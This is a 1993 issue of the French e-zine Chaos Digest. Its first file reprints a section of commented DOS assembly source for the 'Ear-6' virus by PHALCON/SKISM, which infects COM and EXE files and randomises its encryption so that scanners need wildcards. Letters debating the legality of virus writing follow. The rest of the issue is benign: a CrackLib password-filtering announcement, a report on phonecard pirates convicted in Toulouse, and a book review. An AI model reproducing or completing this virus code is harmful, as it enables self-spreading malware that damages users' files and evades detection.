Chaos Digest Dimanche 4 Juillet 1993 Volume 1 : Numero 71 ISSN 1244-4901 Editeur: Jean-Bernard Condat ( Archiviste: Yves-Marie Crabbe Co-Redacteurs: Arnaud Bigare, Stephane Briere TABLE DES MATIERES, #1.71 (4 Juillet 1993) File 1--40H VMag Number 8 Volume 2 Issue 4 #009(2)-010 (reprint) File 2--Bien choisir son mot de passe (produit) File 3--171892 FF depense sur une telecarte de 150 unites (communique) File 4--"Computer Virus Desk Reference" de Chris Feudo (critique) Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are available at no cost by sending a message to: with a mail header or first line containing the following informations: X-Mn-Admin: join CHAOS_DIGEST The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070) or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P. 155, 93404 St-Ouen Cedex, France. He is a member of the EICAR and EFF (#1299) groups. Issues of ChaosD can also be found from the ComNet in Luxembourg BBS (+352) 466893. Back issues of ChaosD can be found on the Internet as part of the Computer underground Digest archives. They're accessible using anonymous FTP: * [] in /pub/cud/chaos * [] in /pub/CuD/chaos * [] in /pub/mirror/cud/chaos * [] in /e-serials/alphabetic/c/chaos-digest * [] in /mirror3/EFF/cud/chaos * [] in /pub/text/CuD/chaos * [] in /pub/doc/cud/chaos * [] in /pub/cud/chaos CHAOS DIGEST is an open forum dedicated to sharing French information among computerists and to the presentation and debate of diverse views. ChaosD material may be reprinted for non-profit as long as the source is cited. Some authors do copyright their material, and they should be contacted for reprint permission. Readers are encouraged to submit reasoned articles in French, English or German languages relating to computer culture and telecommunications. Articles are preferred to short responses. Please avoid quoting previous posts unless absolutely necessary. DISCLAIMER: The views represented herein do not necessarily represent the views of the moderators. Chaos Digest contributors assume all responsibility for ensuring that articles submitted do not violate copyright protections. ---------------------------------------------------------------------- Date: Tue May 11 09:24:40 PDT 1993 From: (American_Eagle_Publication_Inc. ) Subject: File 1--40H VMag Number 8 Volume 2 Issue 4 #009(2)-010 (reprint) cmp word ptr [bp+buffer], 'ZM' ;?Es EXE o COM? jz buscaEXE buscaCOM: mov ax, word ptr [bp+f_long] ;?Cuan grande es la ficha? sub ax, longitud_del_virus + 3 ;Adjusta para el JMP cmp ax, word ptr [bp+buffer+1] ;?Ya es infectada? jnz infecta_mi_burro ;"infect my ass" jmp short BuscaMas buscaEXE: cmp word ptr [bp+buffer+10h], id jnz infecta_mi_burro BuscaMas: mov ah, 4fh ;Busca otra ficha... jmp short brb_brb hasta_la_vista_bebe: ;?Le gusta Arnold? ret infecta_mi_burro: ;AX = longitud de la ficha infectada lea si, [bp+buffer] cmp word ptr [si], 'ZM' jz InfectaEXE InfectaCOM: push ax mov cx, word ptr [bp+tempo] mov word ptr [bp+remendar1+1], cx lea di, [bp+Primer3] movsb push si movsw mov byte ptr [bp+buffer], 0e9h pop di add ax, longitud_del_virus stosw mov cx, 3 jmp short TerminaInfeccion InfectaEXE: les ax, [si+14h] ;Salva el original empieza mov word ptr [bp+EXE_Donde_JMP2], ax;CS:IP de la ficha infectada mov word ptr [bp+EXE_Donde_JMP2+2], es les ax, [si+0Eh] ;Salva la original locacion mov word ptr [bp+PilaOriginal2], es ;de la pila mov word ptr [bp+PilaOriginal2+2], ax mov ax, word ptr [si + 8] mov cl, 4 shl ax, cl xchg ax, bx les ax, [bp+offset nuevoDTA+26] mov dx, es push ax push dx sub ax, bx sbb dx, 0 mov cx, 10h div cx mov word ptr [si+14h], dx ;Nuevo empieza CS:IP mov word ptr [si+16h], ax mov cl, 4 shr dx, cl add ax, dx mov word ptr [si+0Eh], ax ;y SS:SP mov word ptr [si+10h], id pop dx ;Restaura el magnitud de pop ax ;la ficha add ax, longitud_del_virus ;Anada el magnitud del virus adc dx, 0 mov cl, 9 push ax shr ax, cl ror dx, cl stc adc dx, ax pop ax and ah, 1 mov word ptr [si+4], dx ;Nuevo magnitud de la ficha mov word ptr [si+2], ax push cs pop es mov ax, word ptr [si+14h] sub ax, longitud_del_virus + offset Empezarvir push ax mov cx, 1ah TerminaInfeccion: mov al, 2 call abrir mov ah, 40h lea dx, [bp+buffer] int 21h mov ax, 4202h xor cx, cx cwd ;xor dx,dx int 21h mov ah, 2ch ;Numeros azados en CX y DX int 21h mov word ptr [bp+remendar3+2], cx ;Es el nuevo numero de la ;cifra and cx, 31 ;Pone un numero azado para el add cx, ((longitud_del_virus + 1) / 2);magnitud de la ficha. Por ;eso, los scanners necesitan mov word ptr [bp+remendar2+1], cx ;usar "wildcards" lea di, [bp+tempstore] mov al, 53h ;push bx stosb ;(no destruir el mango de la ; ficha) lea si, [bp+shwing] ;Copia las instrucciones push si ;para formar la cifra mov cx, longitud_de_la_cifra push cx rep movsb mov al, 5bh ;pop bx stosb ;(recuerda mango de la ficha) lea si, [bp+escribir] ;Copia las instrucciones mov cx, longitud_del_escribir ;para anada el virus a la rep movsb ;ficha mov al, 53h ;push bx stosb pop cx ;Copia las instrucciones pop si ;para invalidar la cifra rep movsb mov ax, 0c35bh ;pop bx, retn stosw pop ax ;Codo del comienzo de la cifra add ax, offset EmpezarCifra + longitud_del_virus mov word ptr [bp+remendar1+1], ax call antes_del_tempstore mov ax, 5701h ;BX = mango de la ficha mov dx, word ptr [bp+f_fecha] mov cx, word ptr [bp+f_hora] int 21h ;Restaura fecha y hora mov ah, 3eh int 21h xor ch, ch mov cl, byte ptr [bp+f_atrib] mov ax, 4301h lea dx, [bp+offset nuevoDTA + 30] ;Busca un ficha en el DTA int 21h inc byte ptr [bp+numinf] jmp BuscaMas Primer3 db 0CDh, 20h, 0 puntos db '..',0 mascara1 db '*.EXE',0 mascara2 db '*.COM',0 abrir: mov ah, 3dh ;Abrir un ficha lea dx, [bp+nuevoDTA+30] ;Nombre de la ficha es en int 21h ;el DTA xchg ax, bx ret indice dw offset oreja1, offset oreja2, offset oreja3, offset oreja4 dw offset oreja5, offset oreja6, offset oreja4, offset oreja1 oreja1 db '1','Auditory Canal$' oreja2 db '1','Lobe$' oreja3 db '2','Anvil$' oreja4 db '2','Eustachian Tube$' oreja5 db '3','Auditory Nerve$' oreja6 db '3','Cochlea$' mensaje db 'PHALCON/SKISM 1992 [Ear-6] Alert!',13,10,'Where is the $' secciones db ' located?',13,10 db ' 1. External Ear',13,10 db ' 2. Middle Ear',13,10 db ' 3. Inner Ear',13,10,'( )',8,8,'$' ;No es bueno. suspendido db 13,10,'You obviously know nothing about ears.' db 13,10,'Try again after some study.',13,10,'$' ;!Espero que si! aprueba db 13,10,'Wow, you know your ears! Please resume work.',13,10 db '$' escribir: mov ah, 40h mov cx, TerminaVir - EmpezarVir lea dx, [bp+EmpezarVir] int 21h termina_escribir: backslash db '\' TerminaVir = $ ;Los que sigue son en el monton... longitud_de_la_cifra = offset EmpezarCifra - offset shwing diroriginal db 64 dup (?) tempo dw ? nuevoDTA db 43 dup (?) numinf db ? antes_del_tempstore: ;tempstore es el buffer para el parte del programa que anada el virus al fin ;de otro programa tempstore db (longitud_de_la_cifra*2+longitud_del_escribir+5) dup (?) ;anada cinco para los pop, ;los push, y el retn buffer db 1ah dup (?) f_atrib db ? ;atributo de la ficha f_hora dw ? ;hora de creacion f_fecha dw ? ;fecha de creacion f_long dd ? ;magnitud de la ficha end Empezar +++++ 40Hex Number 8 Volume 2 Issue 4 File 010 Letters to the editor! Well, as you can imagine when I got this message I was quite startled. Sorry Paul, no top billing this time :-). Although it is at this point, that I would like to say a couple things. For instance, the virus community seems to think that their actions go unnoticed. As you might imagine, this is not quite true. C'mon, security people get their hands on 40Hex shortly after our boards get it. Just letting you know that big brother is watching :). ---------------------------------------------------------------------------- 40-Hex Response: As a Security Analyst I find 40-Hex an incredibly interesting magazine. The magazine presents entirely different viewpoints then what is in the industry magazines such as Virus Bulletin, Virus News International and Virus News and Reviews. Although all three of these publications are good and very useful to me in my job, 40-Hex does indeed keep my mind open. It discusses viruses in depth, including commented source code, and has been a real learning tool for me. There is just not anywhere that you can get the detailed analysis of a virus except in a magazine like 40-Hex. I can't help but be torn between my thirst for knowledge about virii and how they work, and the fear that the more knowledge about virus writing becomes available to the public, the greater chance that there is going to be more and more garbage out there and more and more irresponsible people releasing this garbage on their "friends and neighbors". I do want to thank 40-Hex for what I consider a very favorable review. I had to laugh about the comments, because frankly I agreed with them. I guess that I do get a little melodramatic sometimes. But I do honestly believe that the knowledge exists out there to create a program/virus that will be able to escape detection by any method in use today. Whether it will ever be written and whether it will have destructive capabilities I don't really know. I don't know of any virus writers that make profits off their work. While all the anti-virus developers, although they complain about the work that they have to do to keep up with the virus writers, certainly make a nice profit on something like a Michelangelo scare. So the only motivation for the virus writer is the challenge of creating a nearly undetectable virus. I am very curious myself to see if the NCSA's prediction of 40,000 virii by 1994 comes true. I certainly agree with 40-Hex that most of these virii will be hacks of some of the existing code out there now. The anti-virus industry itself can't decide on how to count different strains of viruses, so anyone will be able to make whatever claim they want anyway. Finally, Dr. Solomon said it best informally at the First International Virus Prevention Conference. He was talking about how America was founded on freedom and the rights of the individual. He said that Americans seem far too willing, in his opinion, to voluntarily give up those rights. Right now, virus writing is not illegal. And hopefully it never will be, because what you or I do with our own personal computers is no one else's business but our own. But when we interfer with someone else's computer or data or life, that I believe that is where the line is drawn. Its going to be a very long and hard process to determine responsibility for damages caused by a virus. Passing a law to make virus writing itself illegal will not solve the problem. Something, though, has to be done to protect an individual's or a corporation's rights to have a virus-free working environment. There are enough problems with buggy commercial software, without having to worry about virii hitting your computers too. But until that time comes part of my job will continue to be warning people about the dangers of viruses and helping them protect their data. Paul Melka Response to a Response to a Response: +------------------------------------ As the head of the -=PHALCON/SKISM=-, I find your letter a very interesting response. I thank you for your raving reviews on 40Hex. We try to make it a magazine that everyone can learn from. Well, I still debate the undetectable virus issue. Regarding the virus writer/anti-virus issue, I definately agree, that the anti-virus people are motivated by greed more then anything else. I am glad to see that you agreed with my oh so witty comments, they weren't meant to be abusive, just a little comic relief. I agree with you on the issues regarding a virus-free working environment. But, as you already know, writing a virus isn't illegal, it is the spreading that is illegal. Unfortunately, it is too late to start working on anti-virus writing legislation now. The damage has been done. The virus issue is fairly similiar to the AIDS issue. You have to use protection, no matter what. There will never be an end to virii. Even if everyone stopped writing virii, the infection rate wouldn't decrease. I don't know of many people that get hit by the newer strains that have been coming out. Most people still get hit by Jerusalem, Stoned, and other 'classics'. I would be very interested in what solutions you may have come up with to protect the rights of individuals and corporations. I hadn't heard about Dr. Solomon's comments, until I recieved your letter. Quite frankly, I agree with what he is saying. Another major problem with making virus writing illegal is the definition of a virus, or trojan for that matter. It is very difficult to come up with a concrete definition. I appreciate your response, and definately encourage other people, either pro- or anti- virus to respond! -)GHeap ------------------------------ Date: 18 Jun 1993 13:01:15 GMT From: (Alec Muffett - Sun IS - System Admin ) Subject: File 2--Bien choisir son mot de passe (produit) CrackLib is a library containing a C function (well, lots of functions really, but you only need to use one of them) which may be used in a "passwd"-like program. The idea is simple: try to prevent users from choosing passwords that could be guessed by "Crack" by filtering them out, at source. CrackLib is an offshoot of the version 5 "Crack" software, and contains a considerable number of ideas nicked from the new software. At the time of writing, Crack 5 is incomplete (still awaiting purchase of my home box) but I though I could share this with you. NOTE THIS WELL: CrackLib is NOT a replacement "passwd" programm. CrackLib is a LIBRARY. CrackLib is what trendy marketdroid types would probably call an "enabler". The idea is that you wire it into your _own_ "passwd" program (if you have source); alternatively, you wire it into something like "shadow" from off of the net. You can use it almost _everywhere_. FOR YOUR INFORMATION CrackLib has been tested mostly on Suns. If you can point me at ways round portability problems (eg: static linking, other libraries, etc) I'd be most grateful. A reference copy of CrackLib (+ large dictionary) can be found via anonymous FTP at: ~ftp/src/security/cracklib25.tar.Z [ChaosD: Nous avons demande l'avis de plusieurs specialistes sur Crack v4.1f et UFC-crypt. En voici un:] Date: Mon, 21 Jun 1993 15:54:07 +0100 From: (Paul Leyland ) I don't know that I am the ideal person to write anything much about Crack and/or UFC. I suggest that you contact their authors and For my part, I have used Crack to test the passwords used by a number of Oxford systems. I found around 150 passwords before I lost interest; it took me about 3 weeks cpu time on a DEC5500 to get that lot. Some systems were much more secure than others: one had almost 25% of its password discovered; another had only 1 out of over 300. I have not used Crack for over a year, now that we have moved over to a shadow password scheme. I have also collected a few dictionaries together, and made them available by anon-ftp from More recently (Friday!) Alec Muffett's cracklib has been released and made available on black. As for UFC, I managed to deduce how DEC's crypt16() library routine works and then made a few trivial changes to Michael Glad's code to produce a ufc-crypt16. I can't take much credit for anything else and, to be quite honest, do not really know how Glad code works. ------------------------------ Date: Sun Jul 4 10:55:00 1993 From: (David Michelson ) Subject: File 3--171892 F depense sur une telecarte de 150 unites (communique) Copyright: Agence France Presse, 1993 Justice France - France Telecom demande plus d'un million de dommages a des pirates de telecartes - TOULOUSE, 1er juin 93 (250 MOTS) France Telecom a demande mardi plus d'un million de francs de dommages a douze "pirates" de cartes a puces telephoniques, qui ont comparu mardi devant le Tribunal Correctionnel de Toulouse. Le Parquet, de son cote, a requis une peine de quatre mois de prison avec sursis a l'encontre du principal inventeur d'un dispositif qui permettait de recharger a l'infini les puces des cartes telephoniques usagees. Denis Hory, 26 ans, etait "un petit genie de l'electronique", selon ses camarades d'une grande ecole de genie electrique de Toulouse, ou il etudiait en 1989, au moment des faits. Il avait mis au point un systeme simple lui permettant de renover les cartes a puce grace a un interrupteur et une pile electrique. Devant le succes de son invention, il l'avait commercialisee a petite echelle, notamment aupres de camarades Polynesiens et des Caraibes qui desiraient parler a leurs familles a peu de frais. France Telecom lui demande 600.000 francs de dommages. Le centre de gestion des cartes de France Telecom a localise les anomalies d'utilisation et alerte, en aout 1990, la gendarmerie qui a pu remonter la filiere. Selon France Telecom,le prejudice est "difficile a fixer avec precision", et les enqueteurs n'ont pu trouver que deux Telecartes utilisees. Mais l'une d'entre-elles avait totalise 214.865 unites (171.892 francs) pour une duree theorique de 150 (100 francs). Le jugement a ete mis en delibere au 8 Juin. mgl/da +++++ Justice Telecom - Des pirates de telecartes condamnes a verser 300.000 francs de dommages a France Telecom - TOULOUSE, 23 juin 93 (250 MOTS) Sept "pirates" de cartes a puce telephoniques ont ete condamnes,mercredi, par le tribunal correctionnel de Toulouse a verser solidairement 300000 francs de dommages a France Telecom, ainsi qu'a des peines d'emprisonnement allant d'un an dont onze mois avec sursis a deux mois avec sursis. [...] A l'audience, France Telecom avait demande plus d'un million de francs de dommages, se basant sur l'une des deux cartes retrouvees par les enqueteurs [...]. Estimant le montant des dommages trop eleve, l'un des avocats de la defense a annonce mercredi qu'il comptait faire appel du jugement. nd/da ------------------------------ Date: Fri Jun 25 13:47:00 -0600 1993 From: ("Rob Slade, DECrypt Editor ) Subject: File 4--"Computer Virus Desk Reference" de Chris Feudo (critique) Copyright: Robert M. Slade, 1993 Business One Irwin Homewood, IL 60430 Chris Feudo - The Computer Virus Desk Reference, 1992 I must make one thing perfectly plain from the start, here. You are going to have to determine for yourself whether I am biased in favour of this book because it reprints a fair amount of my own writing, or whether I am biased against the book because I am not being paid for any of it. The title is definitely correct. This is far too large a tome to be a handbook or a "quick" reference. Of the 556 pages in the book, more than 400 come from other sources. Patty Hoffman has contributed about 250 in the form of three sections from the Virus Summary list;Chris McDonald and myself are represented by about 50 pages of antiviral software reviews each. Jim Wright's list of antiviral archive sites is included, as is a copy of the "Dirty Dozen" list of "malware" sightings. The structure of the work is as a small "book" with a lot of large appendices. The "book" part, unfortunately, is somewhat confused. On the one hand there are items which, if they are not perhaps in outright error, definitely mislead the naive reader. For example, the definitions at the beginning of the book tell us that a trojan horse "can easily implant itself in any normal program". The absolute distinction between a trojan horse and a viral program may not always be clear. A program infected with a virus may be seen as a type of trojan horse since it carries an undesired "payload". However, most researchers would agree that a trojan horse is the combination of carrier and payload, and that the distinction between a trojan and a virus is that the trojan does *not* have the ability to "implant itself" in another program. Reproduction is the domain of the viral program. Feudo also makes reference, on page 34, to "replacement" viral programs. These he describes as programs which "recode" (and, presumably, recompile) other programs to include themselves. While this kind of activity is occasionally discussed by the research community, no such viral programs have ever been seen. The closest is "p1" in the fictional work "The Adolescence of P1" by Thomas J. Ryan. It is difficult to see why other parts of the book, while interesting, are included in a computer virus reference. For example, there are three pages dedicated to the technology and vendors of wireless LANs. While the network spread of viral programs is a concern, there is no distinction at all between wired or wireless LANs in this regard. The structure of the book overall is somewhat undisciplined. Chapter 2, entitled "Viral Attacks", turns very quickly into an extremely technical overview of the disk and program structure of MS-DOS computers. It then goes on to give case studies of a number of "case studies" of Mac specific viral programs. Two of these are repeated in chapter 4, "Viral Program Analysis", in which most of the MS-DOS case studies are done. As previously mentioned, most of the "contributed" material is in appendices. This is not, however,the case with the bulk of the Hoffman Virus Summary List, which is chapter 5 of the book itself. (Interestingly, although the VTC/CARO Computer Virus Catalog is mentioned in the Acknowledgments, it is *not* reproduced in the book at all.) The contributed reference material may be very helpful to those who have no access to computer network archives and sources. However, it should be noted that much of this is very "dated". Although the book has a copyright date of 1992, and I received a copy early in 1993, the Hoffman Summary List is dated August of 1991. If I recall correctly, the last of the reviews I sent to Chris Feudo were slightly before that. The contact info listed for me is even older: so old that all of the email addresses listed were invalid by the summer of 1991. Aside from the dating of the material,there is much here that is not available in other printed works, or to those who do not have net access. However, this is primarily a reference work, and should be supplemented by more accurate conceptual material on viral operations and prevention. This is particularly true for beginning computer users, since much of the work is either highly technical, or requires additional background material as an aid to understanding. ============== Vancouver | "It says 'Hit any Institute for | key to continue.' Research into | I can't find the User | 'Any' key on my Security Canada V7K 2G6 | keyboard." ------------------------------ End of Chaos Digest #1.71 ************************************